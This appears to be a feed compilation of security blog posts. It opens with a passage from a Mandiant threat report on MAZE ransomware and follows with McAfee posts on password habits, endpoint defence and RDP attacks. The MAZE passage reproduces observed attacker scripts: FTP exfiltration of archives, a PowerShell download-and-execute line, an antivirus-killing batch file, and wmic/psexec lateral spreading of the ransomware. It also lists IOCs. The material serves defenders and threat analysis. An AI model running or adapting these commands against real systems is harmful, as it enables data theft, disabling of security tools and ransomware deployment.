WMIC SHADOWCOPY DELETE (METHODOLOGY)

MAZE RANSOMWARE (FAMILY)

Network Security

Ransomware.Win.MAZE

Ransomware.Maze

Ransomware.Maze

MITRE ATT&CK Mappings

Mandiant currently tracks three separate clusters of activity involved in the post-compromise distribution of MAZE ransomware. Future data collection and analysis efforts may reveal additional groups involved in intrusion activity supporting MAZE operations, or may instead allow us to collapse some of these groups into larger clusters. It should also be noted that ‘initial access’ phase techniques have been included in these mappings, though in some cases this access may have been provided by a separate threat actor(s).

MAZE Group 1 MITRE ATT&CK Mapping

ATT&CK Tactic Category

Techniques

Initial Access

T1133: External Remote Services

T1078: Valid Accounts

Execution

T1059: Command-Line Interface

T1086: PowerShell

T1064: Scripting

T1035: Service Execution

Persistence

T1078: Valid Accounts

T1050: New Service

Privilege Escalation

T1078: Valid Accounts

Defense Evasion

T1078: Valid Accounts

T1036: Masquerading

T1027: Obfuscated Files or Information

T1064: Scripting

Credential Access

T1110: Brute Force

T1003: Credential Dumping

Discovery

T1087: Account Discovery

T1482: Domain Trust Discovery

T1083: File and Directory Discovery

T1135: Network Share Discovery

T1069: Permission Groups Discovery

T1018: Remote System Discovery

T1016: System Network Configuration Discovery

Lateral Movement

T1076: Remote Desktop Protocol

T1105: Remote File Copy

Collection

T1005: Data from Local System

Command and Control

T1043: Commonly Used Port

T1105: Remote File Copy

T1071: Standard Application Layer Protocol

Exfiltration

T1002: Data Compressed

T1048: Exfiltration Over Alternative Protocol

Impact

T1486: Data Encrypted for Impact

T1489: Service Stop

MAZE Group 2 MITRE ATT&CK Mapping

ATT&CK Tactic Category

Techniques

Initial Access

T1193: Spearphishing Attachment

Execution

T1059: Command-Line Interface

T1086: PowerShell

T1085: Rundll32

T1064: Scripting

T1204: User Execution

T1028: Windows Remote Management

Persistence

T1078: Valid Accounts

T1050: New Service

T1136: Create Account

Privilege Escalation

T1078: Valid Accounts

T1050: New Service

Defense Evasion

T1078: Valid Accounts

T1140: Deobfuscate/Decode Files or Information

T1107: File Deletion

T1036: Masquerading

Credential Access

T1003: Credential Dumping

T1081: Credentials in Files

T1171: LLMNR/NBT-NS Poisoning

Discovery

T1087: Account Discovery

T1482: Domain Trust Discovery

T1083: File and Directory Discovery

T1135: Network Share Discovery

T1069: Permission Groups Discovery

T1018: Remote System Discovery

T1033: System Owner/User Discovery

Lateral Movement

T1076: Remote Desktop Protocol

T1028: Windows Remote Management

Collection

T1074: Data Staged

T1005: Data from Local System

T1039: Data from Network Shared Drive

Command and Control

T1043: Commonly Used Port

T1219: Remote Access Tools

T1105: Remote File Copy

T1071: Standard Application Layer Protocol

T1032: Standard Cryptographic Protocol

Exfiltration

T1020: Automated Exfiltration

T1002: Data Compressed

T1048: Exfiltration Over Alternative Protocol

Impact

T1486: Data Encrypted for Impact

MAZE Group 3 MITRE ATT&CK Mapping (FIN6)

ATT&CK Tactic Category

Techniques

Initial Access

T1133: External Remote Services

T1078: Valid Accounts

Execution

T1059: Command-Line Interface

T1086: PowerShell

T1064: Scripting

T1035: Service Execution

Persistence

T1078: Valid Accounts

T1031: Modify Existing Service

Privilege Escalation

T1055: Process Injection

T1078: Valid Accounts

Defense Evasion

T1055: Process Injection

T1078: Valid Accounts

T1116: Code Signing

T1089: Disabling Security Tools

T1202: Indirect Command Execution

T1112: Modify Registry

T1027: Obfuscated Files or Information

T1108: Redundant Access

T1064: Scripting

Credential Access

T1003: Credential Dumping

Discovery

T1087: Account Discovery

T1482: Domain Trust Discovery

T1083: File and Directory Discovery

T1069: Permission Groups Discovery

T1018: Remote System Discovery

Lateral Movement

T1097: Pass the Ticket

T1076: Remote Desktop Protocol

T1105: Remote File Copy

T1077: Windows Admin Shares

Collection

T1074: Data Staged

T1039: Data from Network Shared Drive

Command and Control

T1043: Commonly Used Port

T1219: Remote Access Tools

T1105: Remote File Copy

T1071: Standard Application Layer Protocol

T1032: Standard Cryptographic Protocol

Exfiltration

T1002: Data Compressed

Impact

T1486: Data Encrypted for Impact

T1490: Inhibit System Recovery

T1489: Service Stop

Example Commands Observed in MAZE Ransomware Incidents

function Enum-UsersFolders($PathEnum)
{
    $foldersArr = 'Desktop','Downloads','Documents','AppData/Roaming','AppData/Local'

    Get-ChildItem -Path $PathEnum'/c$' -ErrorAction SilentlyContinue
    Get-ChildItem -Path $PathEnum'/c$/Program Files' -ErrorAction SilentlyContinue
    Get-ChildItem -Path $PathEnum'/c$/Program Files (x86)' -ErrorAction SilentlyContinue

    foreach($Directory in Get-ChildItem -Path $PathEnum'/c$/Users' -ErrorAction SilentlyContinue) {

        foreach($SeachDir in $foldersArr) {
            Get-ChildItem -Path $PathEnum'/c$/Users/'$Directory'/'$SeachDir -ErrorAction SilentlyContinue
        }
    }
}

PowerShell reconnaissance script used to enumerate directories

$Dir="C:/Windows/Temp/"
#ftp server
$ftp = "ftp://<IP Address>/incoming/"
$user = "<username>"
$pass = "<password>"
$webclient = New-Object System.Net.WebClient
$webclient.Credentials = New-Object System.Net.NetworkCredential($user,$pass)
#list every sql server trace file
foreach($item in (dir $Dir "*.7z")){
   "Uploading $item..."
   $uri = New-Object System.Uri($ftp+$item.Name)
   $webclient.UploadFile($uri, $item.FullName)
}

Decoded FTP upload PowerShell script

powershell -nop -exec bypass IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:43984/'); Add-FtpFile -ftpFilePath "ftp://<IP  Address>/cobalt_uploads/<file name>" -localFile "<local file path>\ <file name> " -userName "<username>" -password "<password>"

Decoded FTP upload PowerShell script

[…]
echo 7
echo 7
taskkill /im csrss_tc.exe /f
taskkill /im kwsprod.exe /f
taskkill /im avkwctl.exe /f
taskkill /im rnav.exe /f
taskkill /im crssvc.exe /f
sc config CSAuth start= disabled
taskkill /im vsserv.exe /f
taskkill /im ppmcativedetection.exe /f
[…]
taskkill /im sahookmain.exe /f
taskkill /im mcinfo.exe /f
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
netsh advfirewall firewall set rule group="remote desktop" new enable=Ye
c:\windows\temp\sss.exe

Excerpt from windows.bat kill script

start copy sss.exe \\<internal IP>\c$\windows\temp\
start copy sss.exe \\<internal IP>\c$\windows\temp\

start copy windows.bat \\<internal IP>\c$\windows\temp\
start copy windows.bat \\<internal IP>\c$\windows\temp\

start wmic /node:"<internal IP>" /user:"<DOMAIN\adminaccount>" /password:"<password>" process call create "c:\windows\temp\sss.exe"

start wmic /node:"<internal IP>" /user:"<DOMAIN\adminaccount>" /password:"<password>" process call create "c:\windows\temp\sss.exe"

start wmic /node:"<internal IP>" /user:"<DOMAIN\adminaccount>" /password:"<password>" process call create "cmd.exe /c c:\windows\temp\windows.bat"

start wmic /node:"<internal IP>" /user:"<DOMAIN\adminaccount>" /password:"<password>" process call create "cmd.exe /c c:\windows\temp\windows.bat"

start wmic /node:"<internal IP>" /user:"<DOMAIN\adminaccount>" /password:"<password>" process call create "cmd.exe /c copy \\<internal IP>\c$\windows\temp\sss.exe c:\windows\temp\"

start wmic /node:"<internal IP>" /user:"<DOMAIN\adminaccount>" /password:"<password>" process call create "cmd.exe /c copy \\<internal IP>\c$\windows\temp\sss.exe c:\windows\temp\"

start wmic /node:"<internal IP>" /user:"<DOMAIN\adminaccount>" /password:"<password>" process call create "cmd.exe /c copy \\<internal IP>\c$\windows\temp\windows.bat c:\windows\temp\"

start wmic /node:"<internal IP>" /user:"<DOMAIN\adminaccount>" /password:"<password>" process call create "cmd.exe /c copy \\<internal IP>\c$\windows\temp\windows.bat c:\windows\temp\"

start psexec.exe \\<internal IP> -u <DOMAIN\adminaccount> -p "<password>" -d -h -r rtrsd -s -accepteula -nobanner c:\windows\temp\sss.exe

start psexec.exe \\<internal IP> -u <DOMAIN\adminaccount> -p "<password>" -d -h -r rtrsd -s -accepteula -nobanner c:\windows\temp\sss.exe

start psexec.exe \\<internal IP> -u <DOMAIN\adminaccount> -p "<password>" -d -h -r rtrsd -s -accepteula -nobanner c:\windows\temp\windows.bat

start psexec.exe \\<internal IP> -u < DOMAIN\adminaccount> -p "<password>" -d -h -r rtrsd -s -accepteula -nobanner c:\windows\temp\windows.bat

Example commands from MAZE distribution scripts

@echo off
del done.txt
del offline.txt
rem Loop thru list of computer names in file specified on command-line
for /f %%i in (%1) do call :check_machine %%i
goto end
:check_machine
rem Check to see if machine is up.
ping -n 1 %1|Find "TTL=" >NUL 2>NUL
if errorlevel 1 goto down
echo %1
START cmd /c "copy [Location of MAZE binary] \\%1\c$\windows\temp && exit"
timeout 1 > NUL
echo %1 >> done.txt
rem wmic /node:"%1" process call create "regsvr32.exe /i C:\windows\temp\[MAZE binary name]" >> done.txt
START "" cmd /c "wmic /node:"%1" process call create "regsvr32.exe /i C:\windows\temp\[MAZE binary name]" && exit"
goto end
:down
  rem Report machine down
  echo %1 >> offline.txt
:end

Example MAZE distribution script

Indicators of Compromise

Maze Payloads

064058cf092063a5b69ed8fd2a1a04fe

0f841c6332c89eaa7cac14c9d5b1d35b

108a298b4ed5b4e77541061f32e55751

11308e450b1f17954f531122a56fae3b

15d7dd126391b0e7963c562a6cf3992c

21a563f958b73d453ad91e251b11855c

27c5ecbb94b84c315d56673a851b6cf9

2f78ff32cbb3c478865a88276248d419

335aba8d135cc2e66549080ec9e8c8b7

3bfcba2dd05e1c75f86c008f4d245f62

46b98ee908d08f15137e509e5e69db1b

5774f35d180c0702741a46d98190ff37

5df79164b6d0661277f11691121b1d53

658e9deec68cf5d33ee0779f54806cc2

65cf08ffaf12e47de8cd37098aac5b33

79d137d91be9819930eeb3876e4fbe79

8045b3d2d4a6084f14618b028710ce85

8205a1106ae91d0b0705992d61e84ab2

83b8d994b989f6cbeea3e1a5d68ca5d8

868d604146e7e5cb5995934b085846e3

87239ce48fc8196a5ab66d8562f48f26

89e1ddb8cc86c710ee068d6c6bf300f4

910aa49813ee4cc7e4fa0074db5e454a

9eb13d56c363df67490bcc2149229e4c

a0c5b4adbcd9eb6de9d32537b16c423b

a3a3495ae2fc83479baeaf1878e1ea84

b02be7a336dcc6635172e0d6ec24c554

b40a9eda37493425782bda4a3d9dad58

b4d6cb4e52bb525ebe43349076a240df

b6786f141148925010122819047d1882

b93616a1ea4f4a131cc0507e6c789f94

bd9838d84fd77205011e8b0c2bd711e0

be537a66d01c67076c8491b05866c894

bf2e43ff8542e73c1b27291e0df06afd

c3ce5e8075f506e396ee601f2757a2bd

d2dda72ff2fbbb89bd871c5fc21ee96a

d3eaab616883fcf51dcbdb4769dd86df

d552be44a11d831e874e05cadafe04b6

deebbea18401e8b5e83c410c6d3a8b4e

dfa4631ec2b8459b1041168b1b1d5105

e57ba11045a4b7bc30bd2d33498ef194

e69a8eb94f65480980deaf1ff5a431a6

ef95c48e750c1a3b1af8f5446fa04f54

f04d404d84be66e64a584d425844b926

f457bb5060543db3146291d8c9ad1001

f5ecda7dd8bb1c514f93c09cea8ae00d

f83cef2bf33a4d43e58b771e81af3ecc

fba4cbb7167176990d5a8d24e9505f71

Maze Check-in IPs

91.218.114.11

91.218.114.25

91.218.114.26

91.218.114.31

91.218.114.32

91.218.114.37

91.218.114.38

91.218.114.4

91.218.114.77

91.218.114.79

92.63.11.151

92.63.15.6 

92.63.15.8 

92.63.17.245

92.63.194.20

92.63.194.3

92.63.29.137

92.63.32.2 

92.63.32.52

92.63.32.55

92.63.32.57

92.63.37.100

92.63.8.47

Maze-related Domains

aoacugmutagkwctu[.]onion

mazedecrypt[.]top 

mazenews[.]top

newsmaze[.]top

Maze Download URLs

http://104.168.174.32/wordupd_3.0.1.tmp

http://104.168.198.208/wordupd.tmp

http://104.168.201.35/dospizdos.tmp

http://104.168.201.47/wordupd.tmp

http://104.168.215.54/wordupd.tmp

http://149.56.245.196/wordupd.tmp

http://192.119.106.235/mswordupd.tmp

http://192.119.106.235/officeupd.tmp

http://192.99.172.143/winupd.tmp

http://54.39.233.188/win163.65.tmp

http://91.208.184.174:8079/windef.exe

http://agenziainformazioni[.]icu/wordupd.tmp

http://www.download-invoice[.]site/Invoice_29557473.exe

Malicious Documents

1a26c9b6ba40e4e3c3dce12de266ae10

53d5bdc6bd7904b44078cf80e239d42b

79271dc08052480a578d583a298951c5

a2d631fcb08a6c840c23a8f46f6892dd

ad30987a53b1b0264d806805ce1a2561

c09af442e8c808c953f4fa461956a30f

ee26e33725b14850b1776a67bd8f2d0a

BEACON C2s

173.209.43.61

193.36.237.173

37.1.213.9

37.252.7.142

5.199.167.188

checksoffice[.]me

drivers.updatecenter[.]icu

plaintsotherest[.]net

thesawmeinrew[.]net

updates.updatecenter[.]icu

Cobalt Strike Binaries

7507fe19afbda652e9b2768c10ad639f

a93b86b2530cc988f801462ead702d84

4f57e35a89e257952c3809211bef78ea

bad6fc87a98d1663be0df23aedaf1c62

f5ef96251f183f7fc63205d8ebf30cbf

c818cc38f46c604f8576118f12fd0a63

078cf6db38725c37030c79ef73519c0c

c255daaa8abfadc12c9ae8ae2d148b31

1fef99f05bf5ae78a28d521612506057

cebe4799b6aff9cead533536b09fecd1

4ccca6ff9b667a01df55326fcc850219

bad6fc87a98d1663be0df23aedaf1c62

Meterpreter C2s

5.199.167.188

Other Related Files

3A5A9D40D4592C344920DD082029B362 (related script)

76f8f28bd51efa03ab992fdb050c8382 (MAZE execution artifact)

b5aa49c1bf4179452a85862ade3ef317 (windows.bat kill script) 

fad3c6914d798e29a3fd8e415f1608f4 (related script)

Tools & Utilities

27304b246c7d5b4e149124d5f93c5b01 (PsExec)

42badc1d2f03a8b1e4875740d3d49336 (7zip)

75b55bb34dac9d02740b9ad6b6820360 (PsExec)

9b02dd2a1a15e94922be3f85129083ac (AdFind)

c621a9f931e4ebf37dace74efcce11f2 (SMBTools)

f413b4a2242bb60829c9a470eea4dfb6 (winRAR) 

Email Sender Domains

att-customer[.]com

att-information[.]com

att-newsroom[.]com

att-plans[.]com

bezahlen-1und1[.]icu

bzst-info[.]icu

bzst-inform[.]icu

bzstinfo[.]icu

bzstinform[.]icu

canada-post[.]icu

canadapost-delivery[.]icu

canadapost-tracking[.]icu

hilfe-center-1und1[.]icu

hilfe-center-internetag[.]icu

trackweb-canadapost[.]icu

Sender Domain Registrant Addresses

abusereceive@hitler.rocks

gladkoff1991@yandex.ru

Mandiant Threat Intelligence will host an exclusive webinar on Thursday, May 21, 2020, at 8 a.m. PT / 11 a.m. ET to provide updated insight and information into the MAZE ransomware threat, and to answer questions from attendees. Register today to reserve your spot.

What Does Your Password Say About Your Preferences?

Passwords say a lot about us. They speak to what we prioritize, what we hold dear. So when I recently saw my wife’s password included the kids birthdays and not mine, her priorities were pretty clearI sure know where I stand! 

Whether it’s children’s birth dates or dog names, passwords reveal who we are and what we value, as we all incorporate the relevant aspects of our lives into our passwords to make them easier to remember. While convenient, this habit could actually cause some security mishaps.  

As we honor the first Thursday in May, better known as World Password Day, let’s take a step back to examine some of these common password habits as well as discuss some tips users can follow to secure their online accounts from any potential hackers. 

Common Password Habits

As human beings, we like to keep things simple — which isn’t always a bad thing. However, it’s not ideal when it comes to password security. According to Tech Times, a recent worldwide survey conducted by the United Kingdom’s National Cyber Security Centre on the most common passwords revealed that 23.2 million people still have passwords mentioning the classic ‘123456’ and that ‘123456789’ is used by 7.7 million people worldwide.  

Aside from common character sequences, many people (including my wife) also use significant dates or names of their loved ones as passwords. According to another recent study conducted by The Harris Poll in partnership with Google, nearly 60% of people studied said their birthday has been integrated into at least one password, 33% use a pet’s name, and 22% use their own name. Other common habits also include reusing the same password across multiple accounts, writing them down on a piece of paper, keeping them in a file on their computer, or keeping them in a file on Dropbox or a similar platform.  

These shortcuts are understandable, as it can be challenging to recall so many complex passwords. In fact, a previous McAfee survey stated that 26% of individuals would be willing to give up pampering (manicures, pedicures, massages, etc.) if they never had to remember a password again. Additionally, 34% of respondents are most concerned with the ease of remembering their passwords. 

Potential Security Risks

While convenient, these techniques are not exactly foolproof and can lead to some security concerns. That’s because personalized and simple passwords can put our data a bit more at risk – since hackers can usually find information like birthdays, anniversaries, and pet names online. For instance, that harmless Facebook quiz you were thinking of taking to pass the time can actually reveal your personal information to scammers, allowing them to access your online accounts.  

It’s important users are aware of this risk, but especially as we all navigate working from homeAs McAfee’s Raj Samani, Chief Scientist and Fellow, would attest, “Password security is essential, especially with the new normal many organizations and people are facing. Staying aware and educated about proper password hygiene is essential for us to keep our data secure as we are connected more than ever these days.” That starts with forming good password habits. Sorry “baxterthedog1234!” 

Secure Your Online Accounts

In the post-pandemic world, my family, including my young kids, spends 6+ hours online daily. In the last month, m6-year-old created 10+ online accounts to do her schoolwork and play. In this new reality, we all have the chance to build better password habits for ourselves and teach them to our kidsThat doesn’t mean we have to remember 27 completely unique and complex passwords but can instead just adopt a few easy best practices to help keep our credentials safe. Check out the following tips to help secure your online accounts from criminals.  

Use a passphrase

According to ZDNetthe FBI recently found that using a passphrase made up of multiple words in a long string of at least 15 characters is not only more difficult for hackers to crack, but also easier for users to remember. Instead of making a basic password, create a longer passphrase from the lyrics to your favorite song or the ingredients used to make your favorite dish.  

Ensure your passwords are unique

Your password or passphrase should be as unique as the information it’s protecting! If a hacker does manage to guess your password for one of your online accounts, it’s likely that they will check for repeat credentials across multiple sites. By using different passwords or passphrases for your online accounts, you can remain calm and collected knowing that the majority of your data is secure if one of your accounts becomes vulnerable 

Use a password manager

Take your security to the next level with a password manager or a comprehensive security solutionlike McAfee Total Protection, that comes with one. A password manager can help you create strong passwords, remove the hassle of remembering numerous passwords, and log you on to websites automatically. Who says staying secure has to be complicated? 

Use multi-factor authentication

Two or multi-factor authentication provides an extra layer of security, as it requires multiple forms of verification like texting or emailing a secure code to verify your identity. Most popular online sites like GmailDropbox, LinkedIn, Facebook, etc. offer multi-factor authentication and it takes just few minutes to set it up. This reduces the risk of successful impersonation by criminals. Mind you, authentication methods are also evolving due to advanced technology like biometrics. Perhaps the day will be renamed to World No Password Day in the future. 

Stay Updated

To stay updated on all things McAfee and on top of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook. 

The post What Does Your Password Say About Your Preferences? appeared first on McAfee Blogs.

Silver linings: Why COVID-19 will encourage a national privacy law

Future generations will judge our response to the COVID-19 pandemic not only by our real-time public health and economic actions, but also by our post-pandemic regulatory choices. One of these choices will be how Congress should address the data privacy question, which is rising to new prominence as we embrace the notion that tech and data are integral to a successful and modern pandemic response.

Once we are on the other side of this critical moment, we must come together as a society, draw from the lessons learned, and create a national privacy standard that balances continued innovation and individual privacy. This is not only possible. It is imperative.

To read this article in full, please click here

(Insider Story)

ENS 10.7 Rolls Back the Curtain on Ransomware

Ransomware protection and incident response is a constant battle for IT, security engineers and analysts under normal circumstances, but with the number of people working from home during the COVID-19 pandemic that challenge reaches new heights. How do you ensure an equivalent level of adaptable malware protection on or off the corporate network? How do you enable remote services securely? How long will it take you to recover remote end user systems and data encrypted by ransomware?

As remote workers and IT engineers increasingly use Remote Desktop Protocol (RDP) to access internal resources, attackers are finding more weaknesses to exploit. Attackers are exploiting weak authentication or security controls and even resorting to buying RDP passwords in the underground markets. Exploiting these weaknesses can give an attacker admin access and an easy path to install ransomware or other types of malware, then find their way around the corporate network. To see some examples of how attackers are exploiting RDP weaknesses, check out additional blog posts from McAfee Advanced Threat Research (ATR)

In this blog, we will show how you can leverage Endpoint Security or ENS, McAfee’s Endpoint Protection Platform (EPP), led by some of the new capabilities in ENS 10.7 and MVISION Endpoint Detection and Response (EDR), to do just that.

ENS 10.7, with Threat Prevention, Firewall, Web Control and Adaptive Threat Protection modules backed up by Global Threat Intelligence (GTI) provides adaptable, defense in depth capability against the techniques used in targeted ransomware attacks. For more examples of these techniques, see McAfee ATR’s recent blog on LockBit. Pairing ENS 10.7 with MVISION EDR gives the SOC analysts a powerful toolset to quickly identify attempts to steal credentials and lateral move further into the network.

Finally, McAfee ePolicy Orchestrator (ePO) provides a central management console for endpoint security policy, event collection and reporting on your protected systems on or off the corporate network. Let’s explore some of the key defensive steps you can take to lower your risk against targeted ransomware.

Prevent Initial Access with Threat Prevention

The Endpoint Security Threat Prevention module contains several capabilities including signature scanning and exploit prevention through behavior blocking and reputation analysis, to prevent an attacker gaining access to the system. The first step is to ensure you have the minimum level of security in place. This includes following best practice for on-access and on-demand scanning policies, up to date DAT Files and Engine, and Exploit Prevention content, as well as Global Threat Intelligence access enabled. Targeted ransomware attacks may also leverage file-less exploit techniques which could bypass file-based signature scans and reputation checks. Exploit Prevention rules can be configured to either log or block PowerShell behavior.

However, PowerShell is a legitimate system administration tool and we recommend a period of observation and testing before setting any of these rules to block. For some best practice, you can review this guide as a starting point or check with support for the latest documents.

Restrict RDP as an Initial Attack Vector with Endpoint Security Firewall

If RDP is needed to access internal resources on a server or to troubleshoot a remote system, the best practice is to restrict access to the service using a firewall. This will prevent attackers from leveraging RDP as the initial access vector. ENS 10.7 contains a stateful firewall fully managed via McAfee ePolicy Orchestrator (ePO). You can create policies to restrict RDP access to a remote client to only authorized IP addresses, restrict outbound usage to prevent lateral movement by RDP or block access to that port altogether. Here is an example configuration to restrict inbound access to a remote system on RDP.

  1. Open your Firewall Rules policy and locate the default rule under Network Tools.

  1. If you are using a non-standard port for RDP adjust the local port for this rule appropriately.
  2. Modify the rule by adding authorized IP addresses as remote networks (these are the remote addresses authorized to connect to your endpoints).

  1. Save the changes and apply the policy to endpoints to restrict RDP access.

For additional security create an identical rule but set to block rather than allow, position it below the above rule, and remove the remote IP addresses (so that it applies to all RDP connections not matching the above rule).

  1. Set this rule as an intrusion so that it logs all denied events and forwards them to ePO.

Security analysts in the SOC can then monitor and report on unauthorized access attempts through ePO dashboards. The event logs are useful for early warning, trend analysis and for threat detection and response.

You can find more information on Endpoint Security firewall features here.

Prevent Access to Malicious Websites with Web Control

Attackers often leverage watering holes and spear phishing with links to malicious sites to gain initial access or further infiltrate the network. When a user is on the corporate network, they are often behind a Web Proxy like McAfee Web Gateway. However, many of your mobile clients are going direct to the internet and not through the corporate VPN. This creates more exposure to web-based threats. The Endpoint Security Web Control module monitors web searching and browsing activity on client computers and protects against threats on webpages and in file downloads.

You use McAfee ePO to deploy and manage Web Control on client systems. Settings control access to sites based on their safety rating, reputation from Global Threat Intelligence, the type of content they contain, and their URL or domain name. The configuration settings allow you to adjust sensitivity to be more or less restrictive based on your risk appetite.

If you are a McAfee Web Gateway or Web Gateway Cloud Service customer, you should use McAfee Client Proxy (MCP). MCP works with Web Control to route traffic to the right proxy and provide a defense in depth capability for web protection for users on or off the corporate network.

The above are just a few examples of using Endpoint Security Threat Prevention, Web Control and Firewall to restrict initial attack vectors. To learn more about Endpoint Security best practice to restrict initial entry vectors, visit here.

Let’s look at a few more important steps to protect systems against targeted ransomware.

Lockdown the Security Crown Jewels

If an attacker gets on the system through RDP stolen accounts or vulnerability, they may try to modify, delete or disable security software. In ePO, you should ensure that Self Protection is ON to prevent McAfee services and files on the endpoint or server system from being stopped or modified.

Ensure that ENS is configured to require a password for uninstallation.

 

Security analysts should be on high alert for any system that has Self Protection disabled. ePO contains a default query entitled Endpoint Security: Self Protection Compliance Status which can be used to populate a continuous monitoring dashboard or be packaged into a daily report.

Disrupt and Visualize Attacker Behavior with Adaptive Threat Protection (ATP)

ATP adds several more capabilities, such as machine-learning, threat intelligence, script-scanning and application behavior analysis, to disrupt targeted attack techniques including file-based or file-less attacks.

ATP identifies threats by observing suspicious behaviors and activities. When ATP determines that the context of an execution is malicious, it blocks the malicious activity, and if necessary, remediates (see Enhanced Remediation section below). How does this work? The Real Protect scanner inspects suspicious activities on client systems and uses machine-learning techniques to detect malicious patterns. The Real Protect scanner can scan a network-streamed script, determine if it is malicious, and if necessary, stop the script. Real Protect script scanning integrates with AMSI to protect against non-browser-based scripts, such as PowerShell, JavaScript, and VBScript.

For more information on how ATP remediates threats please review the product guide here.

One of the newest features of ENS 10.7 is the Story Graph. The Story Graph provides a visual representation of threat detections. Below is an example from a simulated file-less attack scenario where a Word document, delivered through spear-phishing, leverages a macro and PowerShell to provide command and control, then elevate privileges and perform lateral movement.

The visualization provides a timeline analysis and context around the event. It correctly captured the attack behavior including the communication to an external attacker IP address. With this visualization, an administrator or security analyst can quickly determine malicious behavior was stopped by ATP, preventing the follow-up activity intended by the attacker. The additional context, such as the originating process and a download IP address, can then be used for further investigations using other log sources, for example. It is important to note that in this example, if the Threat Prevention module as described above was set to block all PowerShell behavior, this attack would have been stopped earlier in the chain. Please read further to see what this attack scenario looks like in MVISION EDR.

For more information on how ATP protects against file-less attacks visit here.

Using a Word document and PowerShell is just one example of masquerading attacks in common files. For more examples of these techniques, see the ATR blog on LockBit ransomware.

ATP Brings Automatic File Recovery with Enhanced Remediation

If you have ever seen a ransom note, like the one from Wanna Decryptor below, you will know how big an issue it can be. It will cost you time, money and most likely lead to loss of data.

If this happens on a remote user system, it will lead to extended downtime, frustrated users and present significant challenges for recovery.

One of the new capabilities in ENS 10.7 is Enhanced Remediation. This feature monitors any process with an unknown reputation and backs up changes made by those processes. If the processes exhibit malicious behavior as determined by machine-learning analysis and reputation, enhanced remediation automatically rolls back those changes made to the system and documents to a previous state.

You can see how files impacted by ransomware can be restored through Enhanced Remediation in this video.

Enhanced Remediation requires that ATP is enabled and policies for Dynamic Application Containment are configured. Real Protect Dynamic scanning must also be enabled on the system. Real Protect Dynamic leverages machine learning in the cloud to identify suspicious behavior and is needed to determine a file reputation which is used to trigger an enhanced remediation action.

For information on how to configure ATP, please review the product guide here. For more best practices on tuning Dynamic Application Containment rules, please review the knowledge base article here.

Once policies are established, ensure that you enable “Enhanced Remediation” and “Monitor and remediate deleted and changed files”

If a file is convicted by Real Protect Dynamic and Enhanced Remediation is enabled with the settings above, then recovery happens automatically. The setting “Monitor and remediate deleted or changed files” must be enabled to ensure any files modified by the ransomware are restored to the previous state.

For more information on how Enhanced Remediation works, please review the product guide here.

Continuous Monitoring with ePO Protection Workspace

Now that you have protection controls in place with Threat Prevention and Adaptive Threat Protection, you can monitor using the Compliance Dashboard in ePO to ensure all managed clients stay up to date.

In addition, events triggered by ATP can be sent to ePO. SOC analysts should monitor these events and use the Story Graph as well for additional investigative capability. For more information on reporting and querying events in ePO, please review the product guide here.

Proactive Monitoring and Hunting with MVISION EDR

One of the first questions a threat hunter needs to answer when a new threat is discovered is “are we exposed?” For example, you may have a policy that already prohibits or restricts RDP but how do you know it is enforced on every endpoint? With MVISION EDR, you can perform a real time search across all managed systems to see what is happening right now. The screenshot below shows a Real-time Search to verify if RDP is enabled or disabled on a system. This provides a view into systems potentially at risk and can also be useful context as part of an investigation.

Real-time Search can also identify systems with active connections on RDP…

MVISION EDR also maintains a history of network connections inbound and outbound from the client. Performing an historical search for network traffic could identify systems that actively communicated on port 3389 to unauthorized addresses, potentially detecting attempts at exploitation.

For a security analyst, EDR providers several benefits to accelerate threat detection and response. For more information on those benefits please review the product guide here. In our simulated file-less attack scenario described above, the story graph revealed a PowerShell connection to an external IP address. Suppose an alert ePO administrator created a ticket for further investigation. A first step by the analyst might be a search for the network activity.

Real-time Search in EDR of that network activity looks like this…

An historical search for the same PowerShell activity in EDR now reveals the encoded commands used in the initial entry vector…

EDR also enables proactive monitoring by a security analyst. The Monitoring Dashboard helps the analyst in the SOC quickly triage suspicious behavior. In this case, the attack leveraged Word and PowerShell to gain access and raise privileges. The attack scenario triggered a number of high threats and provides a lot of context for the analyst to make a quick determination that an attack has been attempted, requiring further action…

Our research into targeted ransomware attacks reveals that if an attacker successfully exploits a client, their next actions involve privilege escalation and lateral movement (see our blog on LockBit). Again, you can use MVISION EDR to quickly detect these techniques.

The Alerting Dashboard in EDR will help you quickly identify attempts at privilege escalation and other attack techniques as defined by the MITRE ATT&CK framework.

Lateral movement is usually the next step and that can involve many different techniques. Again, the Alerting Dashboard identifies lateral movement techniques with details into the specific activity that triggered the alert.

Conclusion

Ransomware and RDP are a dangerous combination. Protecting your remote end users requires a good, secure baseline configuration of Endpoint Security with a Firewall and Self Protection enabled and access to adaptable capability such as Adaptive Threat Protection with Enhanced Remediation. The Enhanced Remediation feature is only available starting in version ENS 10.7, so if you are running older versions of ENS or even VSE (yikes), then it is time to upgrade.

However, stopping targeted ransomware from having an impact on the business requires more than prevention. Both ePO and EDR provide the capability for proactive detection, faster investigations and continuous hunting.

Finally, adaptability requires threat intelligence. McAfee Advanced Threat Researchers and Labs are actively monitoring the threat landscape and continuously updating McAfee Global Threat Intelligence systems. Make sure your Endpoint Security and other McAfee products are using GTI for the latest protection.

For more information on targeted ransomware attacks and techniques, see ATR Blog.

For more details about how to securing RDP access in general, you can refer to a previous McAfee blog.

The post ENS 10.7 Rolls Back the Curtain on Ransomware appeared first on McAfee Blogs.

Cybercriminals Actively Exploiting RDP to Target Remote Organizations

The COVID-19 pandemic has prompted many companies to enable their employees to work remotely and, in a large number of cases, on a global scale. A key component of enabling remote work and allowing employees to access internal corporate resources remotely is Remote Desktop Protocol (RDP), which allows communication with a remote system. In order to maintain business continuity, it is very likely that many organizations brought systems online quickly with minimal security checks in place, giving attackers the opportunity to enter them with ease.

RDP is a Microsoft protocol running on port 3389 that can be utilized by users requiring remote access to internal systems. Most of the time, RDP runs on Windows servers and hosts services such as web servers or file servers, for example. In some cases, it is also connected to industrial control systems.

RDP ports are often exposed to the Internet, which makes them particularly interesting for attackers. In fact, accessing an RDP box can allow an attacker access to an entire network, which can generally be used as an entry point for spreading malware, or other criminal activities.

As it can be such a powerful entry vector, McAfee Advanced Threat Research (ATR) has observed many underground markets emerge, offering RPD credentials at relatively low cost. For example, McAfee ATR uncovered access linked to a major international airport that could be bought for only US$10. Since March 2020, the number of exposed RDP ports have increased considerably.

